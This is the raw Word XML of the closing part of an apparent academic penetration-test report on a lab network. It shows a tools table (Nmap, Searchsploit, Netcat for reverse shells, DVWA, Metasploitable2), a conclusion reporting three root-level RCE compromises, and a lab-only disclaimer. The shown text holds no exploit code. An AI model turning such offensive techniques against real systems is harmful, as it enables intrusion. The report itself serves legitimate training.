      <w:tr w:rsidR="00905B53" w14:paraId="5035C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95108A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Nmap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A850A2" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reconnaissance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2A09CE" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port scanning, service detection, OS fingerprinting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C6EB18" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="462537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36DDD2" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Searchsploit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E8A5B1" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vuln Research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29606D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Offline Exploit-DB database search and lookup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5095E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="20DBB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BDAAC" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Netcat (nc)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60A85D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Shells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27D43F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reverse shells, port testing, manual connections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065446" w14:textId="72B74F9C" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00492F95">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10-50.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="16096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084AD3" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wireshark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2B443D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Traffic Analysis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E5ABDC" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Packet capture and network traffic analysis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FEC647" w14:textId="77A82D7E" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="001B378F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="11682F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4804FA" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VirtualBox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F3A471" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Virtualization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F850AE" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Isolated lab VM hosting and network simulation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3BE90C" w14:textId="43C23F2E" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r w:rsidR="001B378F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="3065E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036446" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploitable2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2AAEB7" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr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7D81CA" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Intentionally vulnerable Linux VM for practice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E8FE06" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="5E1109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199801" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DVWA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E93596" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target (Web)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B95918" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Damn Vulnerable Web Application for web attack testing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9B9788" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E93E762" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53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2"/>
        <w:gridCol w:w="7298"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="52931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0859A" w14:textId="77777777" w:rsidR="00905B5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bottom w:val="single" w:sz="6" w:space="0" w:color="0F346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9B2271B" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="712E883D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212D7D74" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This penetration test successfully demonstrated the full attack lifecycle — from initial reconnaissance through exploitation and post-exploitation — against a simulated enterprise network. Three critical unauthenticated remote code execution vulnerabilities were identified and exploited, each resulting in root-level access to the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69329731" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The findings highlight the severe risk posed by unpatched software, weak authentication mechanisms, and unnecessary exposed services. In a real enterprise environment, any one of these vulnerabilities would represent a complete system compromise and potential full network breach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF1AA7" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The remediation recommendations outlined in Section 8 provide a prioritized roadmap for addressing identified weaknesses. Critical vulnerabilities should be patched within 24 hours in production environments, with high-severity issues addressed within one week.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0E4912" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5515E731" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="0F3460"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445330B8" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>DISCLAIMER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4680EE97" w14:textId="77777777" w:rsidR="00905B53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This penetration test was conducted exclusively in an isolated virtual lab environment for educational and academic purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4DF856" w14:textId="77777777" w:rsidR="00905B53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All activities were performed on systems owned and controlled by the author. No real-world systems were accessed or affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593CE125" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Never perform these techniques on systems without explicit written authorization.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00905B5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102F9" w14:textId="77777777" w:rsidR="008F6870" w:rsidRDefault="008F6870">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="030CF16F" w14:textId="77777777" w:rsidR="008F6870" w:rsidRDefault="008F6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DB4D5" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
      </w:pBdr>
      <w:spacing w:before="80"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">For Educational Purposes Only  |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B378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1B378F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871BE" w14:textId="77777777" w:rsidR="008F6870" w:rsidRDefault="008F6870">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6223B44E" w14:textId="77777777" w:rsidR="008F6870" w:rsidRDefault="008F6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9970" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="0F3460"/>
      </w:pBdr>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="0F3460"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">VULNERABILITY ASSESSMENT REPORT  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>|  Simulated Enterprise Network  |  Kali Linux + Metasploit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371C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D064453C"/>
    <w:lvl w:ilvl="0" w:tplc="637AD244">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="356A6ED0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8506D614">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5CF8FB12">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="79D437A0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6A2EF5EA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A1560024">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9C5CDDFA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="40EAC0BE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="247B40F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46EC20E6"/>
    <w:lvl w:ilvl="0" w:tplc="91143BA4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="868AF506">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="99A6E35A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9BBAAD5A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E506A720">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="02F86524">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6BFC15F8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="147C248E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B9DE216C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5427296E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3626DDDA"/>
    <w:lvl w:ilvl="0" w:tplc="9EE080CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="568812EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="85EC4298">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2C7E39FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="489051F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="20F020D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3AA08B9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="AAA6112A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B96C0E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6C717D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46709AD0"/>
    <w:lvl w:ilvl="0" w:tplc="AA84388C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A6ACB76A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F998E1D8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DE6C9A22">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="87E4CCDE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04881496">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3F30A6D8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="21B44EE8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9422487E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="967977859">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1588685786">
    <w:abstractNumId w:val="3"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="440147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B53"/>
    <w:rsid w:val="001B378F"/>
    <w:rsid w:val="00230F35"/>
    <w:rsid w:val="00492F95"/>
    <w:rsid w:val="006D73EC"/>
    <w:rsid w:val="008F6870"/>
    <w:rsid w:val="0090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A954"/>
  <w15:docId w15:val="{2AE1AF5B-133E-451B-9E6A-DE6E8767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A1A2E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6213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0F346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2087</Words>
  <Characters>11896</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>99</Lines>
  <Paragraphs>27</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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TAPAN SATYA BHOGADI</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-10T16:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-10T16:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>